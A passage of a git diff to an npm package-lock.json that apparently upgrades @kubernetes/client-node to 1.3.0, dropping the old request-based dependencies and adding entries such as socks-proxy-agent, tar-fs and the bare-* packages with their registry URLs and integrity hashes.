"https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/strip-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=18" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=0.8" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", "dependencies": { - "safe-buffer": "^5.0.1" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" }, "engines": { - "node": "*" + "node": ">= 14" } }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", + "engines": { + "node": ">= 0.10.0" } }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", + "license": "MIT", "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">= 8" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4" } }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } + "node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, - "node_modules/wrap-ansi-cjs/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/wrap-ansi-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -1147,38 +760,9 @@ "optional": true } } - }, - "node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } } }, "dependencies": { - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, "@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", @@ -1192,154 +776,128 @@ "requires": {} }, "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "requires": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", "openid-client": "^6.1.3", - "request": "^2.88.0", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true + "@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==" + }, + "@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", + "requires": { + "undici-types": "~6.21.0" + } }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "requires": { + "@types/node": "*" + } }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" }, "argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "optional": true }, - "axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", + "bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", + "optional": true, "requires": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - } + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "optional": true }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "optional": true, "requires": { - "tweetnacl": "^0.14.3" + "bare-os": "^3.0.1" } }, - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "optional": true, "requires": { - "balanced-match": "^1.0.0" + "streamx": "^2.21.0" } }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "requires": { - "color-name": "~1.1.4" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" } }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -1348,27 +906,12 @@ "delayed-stream": "~1.0.0" } }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "requires": { - "assert-plus": "^1.0.0" + "ms": "^2.1.3" } }, "delayed-stream": { @@ -1376,123 +919,140 @@ "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": 